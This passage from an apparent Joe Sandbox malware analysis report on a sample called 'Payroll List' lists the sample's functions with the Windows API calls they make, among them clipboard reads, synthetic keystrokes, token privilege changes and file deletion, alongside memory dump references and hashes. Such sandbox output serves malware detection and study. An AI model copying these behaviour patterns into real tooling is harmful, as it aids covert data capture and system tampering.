                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: LibraryLoad
                                                                    • String ID:
                                                                    • API String ID: 1029625771-0
                                                                    • Opcode ID: 6835a613e9910970744cf47f90ff2063449a5087be5f2ce099398601ed1c7b70
                                                                    • Instruction ID: 27b466103edaeaea02f407d0bd5e795aca39228eb2c4fee3c63abd5f19f902b6
                                                                    • Opcode Fuzzy Hash: 6835a613e9910970744cf47f90ff2063449a5087be5f2ce099398601ed1c7b70
                                                                    • Instruction Fuzzy Hash: B1013131500119EFCF09EFA4D8928FEBB75AF20344F108069B566971A5EB309A59DBA0
                                                                    Function 00142AAE Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __lock_file.LIBCMT ref: 00142AED
                                                                      • Part of subcall function 00147C0E: __getptd_noexit.LIBCMT ref: 00147C0E
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: __getptd_noexit__lock_file
                                                                    • String ID:
                                                                    • API String ID: 2597487223-0
                                                                    • Opcode ID: 237780d24fea32e776ed3d2e5b937d82658011fbad59f11c7c9e4f2ae512f35d
                                                                    • Instruction ID: 477a3d6077ea328f4f991b0137c4912576e43119a4e5718fcd1c5fe014155c52
                                                                    • Opcode Fuzzy Hash: 237780d24fea32e776ed3d2e5b937d82658011fbad59f11c7c9e4f2ae512f35d
                                                                    • Instruction Fuzzy Hash: F8F09031A40205EBDF22AFB5CC067DF3AA5BF11324F658415F814AB1B1D7788A92DB52
                                                                    Function 00124252 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • FreeLibrary.KERNEL32(?,?,?,?,?,001239FE,?,00000001), ref: 00124286
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: FreeLibrary
                                                                    • String ID:
                                                                    • API String ID: 3664257935-0
                                                                    • Opcode ID: 06a664b31fd0a6f8e5cb3f3df7d5243748a14b2a8a3304aebc40173960311b2b
                                                                    • Instruction ID: f0de3ff78e61ceb47879ef75b4c40fb2054bb677265b5fe53ec1e444ad90a230
                                                                    • Opcode Fuzzy Hash: 06a664b31fd0a6f8e5cb3f3df7d5243748a14b2a8a3304aebc40173960311b2b
                                                                    • Instruction Fuzzy Hash: 0CF01571505722CFCB389F66F890826BBE4AF143253258A2EF1D686A20C7729890DB50
                                                                    Function 001240A7 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 001240C6
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: LongNamePath
                                                                    • String ID:
                                                                    • API String ID: 82841172-0
                                                                    • Opcode ID: 48f4882186a31bbee81e269378c63c83a4c8a1d429d412d11e4bb5ff011fe78d
                                                                    • Instruction ID: 36c4703ad70e1d91b3f555b60f98f4e0c79e1bcc834d7a5bc79ec37da1a302fa
                                                                    • Opcode Fuzzy Hash: 48f4882186a31bbee81e269378c63c83a4c8a1d429d412d11e4bb5ff011fe78d
                                                                    • Instruction Fuzzy Hash: E8E0C236A002245BCB11A658DC46FEA77ADDFCC6A0F0900B5F909E7254DA64ADC18690
                                                                    Function 00D57108 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • Sleep.KERNELBASE(000001F4), ref: 00D57119
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1435038315.0000000000D54000.00000040.00000020.00020000.00000000.sdmp, Offset: 00D54000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d54000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Sleep
                                                                    • String ID:
                                                                    • API String ID: 3472027048-0
                                                                    • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                    • Instruction ID: 9cdb5c319bcf7ce42890f9bf4d30ab7dcfd89df1741735574831e46b0cff907b
                                                                    • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                    • Instruction Fuzzy Hash: EEE0E67494520DDFDB00DFB8D5496AD7BF4EF04302F1001A1FD01D2280D6309D508A72

                                                                    Non-executed Functions

                                                                    Function 0018F7FF Relevance: 74.1, APIs: 40, Strings: 2, Instructions: 630windowkeyboardCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 0013B34E: GetWindowLongW.USER32(?,000000EB), ref: 0013B35F
                                                                    • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?,?), ref: 0018F87D
                                                                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0018F8DC
                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 0018F919
                                                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0018F940
                                                                    • SendMessageW.USER32 ref: 0018F966
                                                                    • _wcsncpy.LIBCMT ref: 0018F9D2
                                                                    • GetKeyState.USER32(00000011), ref: 0018F9F3
                                                                    • GetKeyState.USER32(00000009), ref: 0018FA00
                                                                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0018FA16
                                                                    • GetKeyState.USER32(00000010), ref: 0018FA20
                                                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0018FA4F
                                                                    • SendMessageW.USER32 ref: 0018FA72
                                                                    • SendMessageW.USER32(?,00001030,?,0018E059), ref: 0018FB6F
                                                                    • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?,?), ref: 0018FB85
                                                                    • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 0018FB96
                                                                    • SetCapture.USER32(?), ref: 0018FB9F
                                                                    • ClientToScreen.USER32(?,?), ref: 0018FC03
                                                                    • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 0018FC0F
                                                                    • InvalidateRect.USER32(?,00000000,00000001,?,?,?,?), ref: 0018FC29
                                                                    • ReleaseCapture.USER32 ref: 0018FC34
                                                                    • GetCursorPos.USER32(?), ref: 0018FC69
                                                                    • ScreenToClient.USER32(?,?), ref: 0018FC76
                                                                    • SendMessageW.USER32(?,00001012,00000000,?), ref: 0018FCD8
                                                                    • SendMessageW.USER32 ref: 0018FD02
                                                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 0018FD41
                                                                    • SendMessageW.USER32 ref: 0018FD6C
                                                                    • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0018FD84
                                                                    • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0018FD8F
                                                                    • GetCursorPos.USER32(?), ref: 0018FDB0
                                                                    • ScreenToClient.USER32(?,?), ref: 0018FDBD
                                                                    • GetParent.USER32(?), ref: 0018FDD9
                                                                    • SendMessageW.USER32(?,00001012,00000000,?), ref: 0018FE3F
                                                                    • SendMessageW.USER32 ref: 0018FE6F
                                                                    • ClientToScreen.USER32(?,?), ref: 0018FEC5
                                                                    • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0018FEF1
                                                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 0018FF19
                                                                    • SendMessageW.USER32 ref: 0018FF3C
                                                                    • ClientToScreen.USER32(?,?), ref: 0018FF86
                                                                    • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0018FFB6
                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 0019004B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$ClientScreen$Image$CursorDragList_LongStateWindow$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                                    • String ID: @GUI_DRAGID$F
                                                                    • API String ID: 2516578528-4164748364
                                                                    • Opcode ID: f0312e081680cd647b04e1490c13d2e86ca3fa343f02c6148c3a3e7d6ed93e4a
                                                                    • Instruction ID: 1d89afea2cf196a81438231a3f749db5e3577600418815801d02c4416077de71
                                                                    • Opcode Fuzzy Hash: f0312e081680cd647b04e1490c13d2e86ca3fa343f02c6148c3a3e7d6ed93e4a
                                                                    • Instruction Fuzzy Hash: E432CE70604344AFDB10EFA4C884BAABBA5FF4A354F04062DF659872A1D770DEA2CF51
                                                                    Function 0018AACE Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 574windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 0018B1CD
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend
                                                                    • String ID: %d/%02d/%02d
                                                                    • API String ID: 3850602802-328681919
                                                                    • Opcode ID: fd544a12bfd50faa866ed9a782b735414845f038a07f92a2b140d523e47d8d2a
                                                                    • Instruction ID: 3911de5e1418f99563cf9a98289ea715654a6f74da3cc69f19892884b9097a2f
                                                                    • Opcode Fuzzy Hash: fd544a12bfd50faa866ed9a782b735414845f038a07f92a2b140d523e47d8d2a
                                                                    • Instruction Fuzzy Hash: 0D12E071504218ABEB29AF64EC89FAE7BB8FF45310F14411AF91ADB2D1DB709A41CF11
                                                                    Function 0013EB42 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 130keyboardthreadwindowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetForegroundWindow.USER32(00000000,00000000), ref: 0013EB4A
                                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00193AEA
                                                                    • IsIconic.USER32(000000FF), ref: 00193AF3
                                                                    • ShowWindow.USER32(000000FF,00000009), ref: 00193B00
                                                                    • SetForegroundWindow.USER32(000000FF), ref: 00193B0A
                                                                    • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00193B20
                                                                    • GetCurrentThreadId.KERNEL32 ref: 00193B27
                                                                    • GetWindowThreadProcessId.USER32(000000FF,00000000), ref: 00193B33
                                                                    • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00193B44
                                                                    • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00193B4C
                                                                    • AttachThreadInput.USER32(00000000,?,00000001), ref: 00193B54
                                                                    • SetForegroundWindow.USER32(000000FF), ref: 00193B57
                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00193B6C
                                                                    • keybd_event.USER32(00000012,00000000), ref: 00193B77
                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00193B81
                                                                    • keybd_event.USER32(00000012,00000000), ref: 00193B86
                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00193B8F
                                                                    • keybd_event.USER32(00000012,00000000), ref: 00193B94
                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00193B9E
                                                                    • keybd_event.USER32(00000012,00000000), ref: 00193BA3
                                                                    • SetForegroundWindow.USER32(000000FF), ref: 00193BA6
                                                                    • AttachThreadInput.USER32(000000FF,?,00000000), ref: 00193BCD
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                    • String ID: Shell_TrayWnd
                                                                    • API String ID: 4125248594-2988720461
                                                                    • Opcode ID: 1e616c7e0ecdf3735558a090334041e8b0ba9349a428aabf629e1698202ed758
                                                                    • Instruction ID: 78a636e31087184615436f559b0710bcbffe179a9cf4e4bc77e9ba095f61976a
                                                                    • Opcode Fuzzy Hash: 1e616c7e0ecdf3735558a090334041e8b0ba9349a428aabf629e1698202ed758
                                                                    • Instruction Fuzzy Hash: 3E31A4B1A40318BBEF306BA59C49F7F7E7CEB45B50F114015FA06EA5D1D7B05D40AAA0
                                                                    Function 0015ACC5 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 223COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 0015B134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0015B180
                                                                      • Part of subcall function 0015B134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0015B1AD
                                                                      • Part of subcall function 0015B134: GetLastError.KERNEL32 ref: 0015B1BA
                                                                    • _memset.LIBCMT ref: 0015AD08
                                                                    • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 0015AD5A
                                                                    • CloseHandle.KERNEL32(?), ref: 0015AD6B
                                                                    • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 0015AD82
                                                                    • GetProcessWindowStation.USER32 ref: 0015AD9B
                                                                    • SetProcessWindowStation.USER32(00000000), ref: 0015ADA5
                                                                    • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 0015ADBF
                                                                      • Part of subcall function 0015AB84: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,0015ACC0), ref: 0015AB99
                                                                      • Part of subcall function 0015AB84: CloseHandle.KERNEL32(?,?,0015ACC0), ref: 0015ABAB
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                                    • String ID: $default$winsta0
                                                                    • API String ID: 2063423040-1027155976
                                                                    • Opcode ID: 87028b6861bb72433647ef57287d33189af7773d32edcc75cf0253c51cfb5d59
                                                                    • Instruction ID: a7beb9fc3e470f1049f8b103e16ac757ecb46864972ac65abd9e43c3263b1068
                                                                    • Opcode Fuzzy Hash: 87028b6861bb72433647ef57287d33189af7773d32edcc75cf0253c51cfb5d59
                                                                    • Instruction Fuzzy Hash: C581ACB1840209EFDF119FA4DC89AEE7BB8FF18305F044219FD25AA561D7318E49DB61
                                                                    Function 001660DD Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 174filestringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00166EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00165FA6,?), ref: 00166ED8
                                                                      • Part of subcall function 00166EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00165FA6,?), ref: 00166EF1
                                                                      • Part of subcall function 0016725E: __wsplitpath.LIBCMT ref: 0016727B
                                                                      • Part of subcall function 0016725E: __wsplitpath.LIBCMT ref: 0016728E
                                                                      • Part of subcall function 001672CB: GetFileAttributesW.KERNEL32(?,00166019), ref: 001672CC
                                                                    • _wcscat.LIBCMT ref: 00166149
                                                                    • _wcscat.LIBCMT ref: 00166167
                                                                    • __wsplitpath.LIBCMT ref: 0016618E
                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 001661A4
                                                                    • _wcscpy.LIBCMT ref: 00166209
                                                                    • _wcscat.LIBCMT ref: 0016621C
                                                                    • _wcscat.LIBCMT ref: 0016622F
                                                                    • lstrcmpiW.KERNEL32(?,?), ref: 0016625D
                                                                    • DeleteFileW.KERNEL32(?), ref: 0016626E
                                                                    • MoveFileW.KERNEL32(?,?), ref: 00166289
                                                                    • MoveFileW.KERNEL32(?,?), ref: 00166298
                                                                    • CopyFileW.KERNEL32(?,?,00000000), ref: 001662AD
                                                                    • DeleteFileW.KERNEL32(?), ref: 001662BE
                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 001662E1
                                                                    • FindClose.KERNEL32(00000000), ref: 001662FD
                                                                    • FindClose.KERNEL32(00000000), ref: 0016630B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: File$Find_wcscat$__wsplitpath$CloseDeleteFullMoveNamePath$AttributesCopyFirstNext_wcscpylstrcmpi
                                                                    • String ID: \*.*$p1Wu`KXu
                                                                    • API String ID: 1917200108-2866000061
                                                                    • Opcode ID: b66f254494f62864e1330c3249f9133dc00a03a033592e35d6edcffec2c503c8
                                                                    • Instruction ID: 398ddcaa9a86b3d9b7b8d361f9d649be09d58ebb552a000fbc7f58c473235af2
                                                                    • Opcode Fuzzy Hash: b66f254494f62864e1330c3249f9133dc00a03a033592e35d6edcffec2c503c8
                                                                    • Instruction Fuzzy Hash: 84511EB290811CAACB21EB91DC54DEF77BCAF15310F0901EAE585E2141DF369B99CFA4
                                                                    Function 00176B0C Relevance: 30.2, APIs: 20, Instructions: 167clipboardCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • OpenClipboard.USER32(001BDC00), ref: 00176B36
                                                                    • IsClipboardFormatAvailable.USER32(0000000D), ref: 00176B44
                                                                    • GetClipboardData.USER32(0000000D), ref: 00176B4C
                                                                    • CloseClipboard.USER32 ref: 00176B58
                                                                    • GlobalLock.KERNEL32(00000000), ref: 00176B74
                                                                    • CloseClipboard.USER32 ref: 00176B7E
                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00176B93
                                                                    • IsClipboardFormatAvailable.USER32(00000001), ref: 00176BA0
                                                                    • GetClipboardData.USER32(00000001), ref: 00176BA8
                                                                    • GlobalLock.KERNEL32(00000000), ref: 00176BB5
                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00176BE9
                                                                    • CloseClipboard.USER32 ref: 00176CF6
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                                                    • String ID:
                                                                    • API String ID: 3222323430-0
                                                                    • Opcode ID: 98ac651fdc268635febb599ffe7c45d93e7529ff3640290c7f66bbc51b58d514
                                                                    • Instruction ID: c346b44cb67c768a5367acf955ad2c6bbd328bc78b0d94b8f517a1c92338abc6
                                                                    • Opcode Fuzzy Hash: 98ac651fdc268635febb599ffe7c45d93e7529ff3640290c7f66bbc51b58d514
                                                                    • Instruction Fuzzy Hash: E951A131244A01ABD305EF60ED86F6E77B8AF99B00F008029F69AD79D1DF70D945CB62
                                                                    Function 0016F5FA Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 278timefileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 0016F62B
                                                                    • FindClose.KERNEL32(00000000), ref: 0016F67F
                                                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0016F6A4
                                                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0016F6BB
                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 0016F6E2
                                                                    • __swprintf.LIBCMT ref: 0016F72E
                                                                    • __swprintf.LIBCMT ref: 0016F767
                                                                    • __swprintf.LIBCMT ref: 0016F7BB
                                                                      • Part of subcall function 0014172B: __woutput_l.LIBCMT ref: 00141784
                                                                    • __swprintf.LIBCMT ref: 0016F809
                                                                    • __swprintf.LIBCMT ref: 0016F858
                                                                    • __swprintf.LIBCMT ref: 0016F8A7
                                                                    • __swprintf.LIBCMT ref: 0016F8F6
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: __swprintf$FileTime$FindLocal$CloseFirstSystem__woutput_l
                                                                    • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                    • API String ID: 835046349-2428617273
                                                                    • Opcode ID: 2b1727223a3b70f6a63514af6e3c7cb84874f525edb220e67e594ec05672fffd
                                                                    • Instruction ID: a0437aa59982419282950e6dd557e47848366dee1ad5b6e383cf4eaf5535dc58
                                                                    • Opcode Fuzzy Hash: 2b1727223a3b70f6a63514af6e3c7cb84874f525edb220e67e594ec05672fffd
                                                                    • Instruction Fuzzy Hash: 62A10EB2408354ABC314EBA4DC86DAFB7ECAFA8704F44092EF595C3151EB34D959CB62
                                                                    Function 00171B2F Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 118fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • FindFirstFileW.KERNEL32(?,?,75568FB0,?,00000000), ref: 00171B50
                                                                    • _wcscmp.LIBCMT ref: 00171B65
                                                                    • _wcscmp.LIBCMT ref: 00171B7C
                                                                    • GetFileAttributesW.KERNEL32(?), ref: 00171B8E
                                                                    • SetFileAttributesW.KERNEL32(?,?), ref: 00171BA8
                                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 00171BC0
                                                                    • FindClose.KERNEL32(00000000), ref: 00171BCB
                                                                    • FindFirstFileW.KERNEL32(*.*,?), ref: 00171BE7
                                                                    • _wcscmp.LIBCMT ref: 00171C0E
                                                                    • _wcscmp.LIBCMT ref: 00171C25
                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00171C37
                                                                    • SetCurrentDirectoryW.KERNEL32(001D39FC), ref: 00171C55
                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 00171C5F
                                                                    • FindClose.KERNEL32(00000000), ref: 00171C6C
                                                                    • FindClose.KERNEL32(00000000), ref: 00171C7C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
